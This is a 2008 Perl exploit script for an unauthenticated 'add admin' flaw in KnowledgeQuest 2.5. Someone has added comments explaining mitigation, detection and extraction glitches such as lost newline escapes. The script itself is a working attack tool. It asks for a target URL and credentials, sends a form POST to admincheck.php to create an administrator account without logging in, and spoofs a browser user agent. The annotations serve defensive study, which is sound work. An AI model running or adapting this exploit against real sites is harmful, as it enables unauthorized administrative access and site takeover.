# Title : KnowledgeQuest 2.5 Arbitrary Add Admin Exploit
# Published : 2008-04-09
# Author : t0pP8uZz
#!/usr/bin/perl
use strict;
use LWP::UserAgent;
# Proof-of-concept for the "Arbitrary Add Admin" issue in KnowledgeQuest 2.5
# named in the page header. The script prompts for a base URL and a
# username/password pair, then sends one form POST to admincheck.php under
# that URL and reports the outcome from the response body.
#
# Defender reading: nothing here authenticates before the POST -- no login
# request is made and no cookies or credentials are configured on the user
# agent. Presumably admincheck.php creates the admin account without checking
# that the caller already holds an admin session; the server code is not
# shown on this page, so confirm against the application source.
# Mitigation: enforce a server-side authenticated-admin check in
# admincheck.php (and any sibling admin scripts) before the account is
# written, and audit the existing admin accounts for entries nobody created.
# Detection: POST requests to /admincheck.php carrying username, password
# and repas from clients with no preceding administrator login.

# Banner. NOTE(review): the trailing "n" in these strings (and the "nn"/"n"
# in the result messages below) looks like a "\n" escape whose backslash was
# lost when the page was extracted; as written a literal "n" is printed.
print "-+------------------------------------------+-n";
print "-+- KnowledgeQuest 2.5 Arbitrary Add Admin -+-n";
print "-+------------------------------------------+-n";
print "-+- Discovered && Coded By t0pP8uzz -+-n";
print "-+- This Exploit will craft a evilpacket -+-n";
print "-+- which will add a admin account -+-n";
print "-+------------------------------------------+-n";
# Interactive input: base URL of the installation, then the account name and
# password to submit. Values are used exactly as typed, minus the newline.
print "Enter URL: ";
chomp(my $url=<STDIN>);
print "Enter Username (you will login with this): ";
chomp(my $usr=<STDIN>);
print "Enter Password (you will login with this): ";
chomp(my $pwd=<STDIN>);
# The agent string imitates MSIE 7.0 instead of LWP's default, so filtering
# on User-Agent alone would not single this request out.
my $ua = LWP::UserAgent->new( agent=> 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)' );
# Form POST with three fields; 'repas' is sent with the same value as
# 'password' (presumably the form's repeat-password field -- confirm).
my $res = $ua->post( $url."/admincheck.php", {'username' => $usr, 'password' => $pwd, 'repas' => $pwd} );
# The result is inferred from the response only: any successful HTTP status
# whose body lacks "taken by another user" is reported as success, so the
# message is not proof that an account exists. A non-success response prints
# nothing at all.
if($res->is_success) {
if($res->content =~ /taken by another user/i) { print "nnExploit Failed! Reason: username already taken!"; exit; }
# NOTE(review): the login address is built without the "/" separator used in
# the POST above, so it is only well-formed when the entered URL ends in "/".
print "nnExploit Success! Login to ".$url."administratorlogin.php with username: ".$usr." and password: ".$pwd."n";
}